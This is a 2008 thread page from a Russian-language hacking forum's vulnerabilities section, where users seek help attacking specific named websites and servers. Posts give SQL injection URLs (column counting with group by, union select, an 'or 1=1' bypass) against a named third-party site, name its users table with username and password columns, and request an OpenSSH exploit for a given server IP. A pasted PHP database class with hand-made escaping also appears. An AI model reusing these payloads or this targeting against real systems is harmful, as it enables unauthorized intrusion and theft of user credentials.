HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #931  
Старый 12.02.2008, 21:19
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

шотто я ниче не вижу....там где написано Каталог Продукции Nl есь какой-то кусок кода,и усё:Р Можно чутка поподробней? А то я нуп Ж(
 
Ответить с цитированием

  #932  
Старый 12.02.2008, 21:21
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Исходный код страницы посмотри. там и будет исходника файла
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #933  
Старый 13.02.2008, 01:03
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

_http://62.140.233.125/wow2/index.php?n=account/create
Может кто-нить подскажет двиг или баги в нем?
 
Ответить с цитированием

  #934  
Старый 13.02.2008, 01:23
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

есть сайт с инекцией
http://wgem.com/Community/event.php?ID=5014'
если через group by подбирать колличество то получается 8
http://wgem.com/Community/event.php?ID=5014+group+by+8
А когда начинаю писать
http://wgem.com/Community/event.php?ID=5014+union+select+1,2,3,4,5,6,7,8/*
выдает что их не 8... что не так?
 
Ответить с цитированием

  #935  
Старый 13.02.2008, 01:27
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Просто там этот id используется в двух запросах к разным таблицам, а посему тут слепая инъекция
 
Ответить с цитированием

  #936  
Старый 13.02.2008, 03:50
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

m0use кури more than 1 row от Elekt'а , там реально все сделать.
Ветка там 4, таблица users, колонки: id,username,password
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #937  
Старый 13.02.2008, 04:22
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от Constantine  
m0use кури more than 1 row от Elekt'а , там реально все сделать.
Ветка там 4, таблица users, колонки: id,username,password
да, можно конечно, но это сложнее для понимания чем например
http://wgem.com/Community/event.php?ID=-5014/**/or/**/1=1/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #938  
Старый 13.02.2008, 15:05
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

class DBMysql {

var $Connected;

var $Connection;

function DBMysql($connection_string) {
$this->Connected = FALSE;
$pattern = '/^([\w\d]+)[^\s]*)@([.\w\d]+);([\w\d]+)$/';
$matches = array();
if ( preg_match($pattern, $connection_string, $matches) != 0 ) {
array_shift($matches);
list($username, $password, $host, $database) = $matches;
if ( $c = @mysql_connect($host, $username, $password) ) {
if ( @mysql_select_db($database, $c) ) {
$this->Connected = TRUE;
$this->Connection = $c;
$this->Query("SET NAMES cp1251");
}
}
}
return($this->Connected);
}

function Close() {
@mysql_close($this->Connection);
$this->Connected = FALSE;
}

function Query($query) {
$args = func_get_args();

if ( sizeof($args)-1 != substr_count($query, '?') ) trigger_error('Wrong arguments count<br>' . $query, E_USER_ERROR);
$sql = "";
$q = 1;
while ( ($pos = strpos($query, '?')) !== FALSE ) {
$l = $query[$pos-1];
$r = $query[$pos+1];
if ( $l == $r ) {
switch ($l) {
case '"':
$args[$q] = str_replace('"', '\"', $args[$q]);
break;
case '\'':
$args[$q] = str_replace('\'', '\\\'', $args[$q]);
break;
case '`':
$args[$q] = preg_replace('/[^a-zA-Z0-9_]/', '' , $args[$q]);
break;
}
}
else if ( !is_numeric($args[$q]) )
$args[$q] = '\'' . str_replace('\'', '\\\'', $args[$q]) . '\'';

$sql .= substr($query, 0, $pos) . $args[$q];
$query = substr($query, $pos+1, strlen($query)-$pos);
$q++;
}
$sql .= $query;

// echo $sql . '<hr>';
$result = mysql_query($sql, $this->Connection) or trigger_error('<b>Ошибка SQL запроса:</b> ' . $sql . '<br />' . mysql_error(), E_USER_ERROR);
return($result);
}

function Fetch($result) {
$row = @mysql_fetch_array($result);
return($row);
}

function FetchQuery($query) {
$args = func_get_args();
$result = call_user_func_array(array(&$this, 'Query'), $args);
$row = $this->Fetch($result);
return($row);
}

function FetchAll($result) {
$r = array();
while ( $row = $this->Fetch($result) ) $r[] = $row;
return($r);
}

function NumRows($result) {
$n = @mysql_num_rows($result);
return($n);
}

function IsEmpty($result) {
$result = ( $this->NumRows($result) == 0 ) ? TRUE : FALSE;
return($result);
}

function LastInsertID() {
return(mysql_insert_id($this->Connection));
}
}

$dbtable = array();
foreach (explode(',', $tablenames) as $tablename) {
$tablename = trim($tablename);
$dbtable[$tablename] = $db_prefix . $tablename;
}

$db = new DBMysql($DB_CONNECTION_STRING);
?>

Просмотрел,поискал,не понял:Р Что там должно быть такое,что меня так сильно интересует )))))
 
Ответить с цитированием

  #939  
Старый 13.02.2008, 15:13
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

а хз чё тебе надо
 
Ответить с цитированием

  #940  
Старый 13.02.2008, 19:15
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

плиз, подскажите, есть для этого SSH-1.99-OpenSSH_3.9p1 сплойт
сервак висит под этим ip 65.98.230.4

http://forum.antichat.ru/showpost.php?p=591791&postcount=4841
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ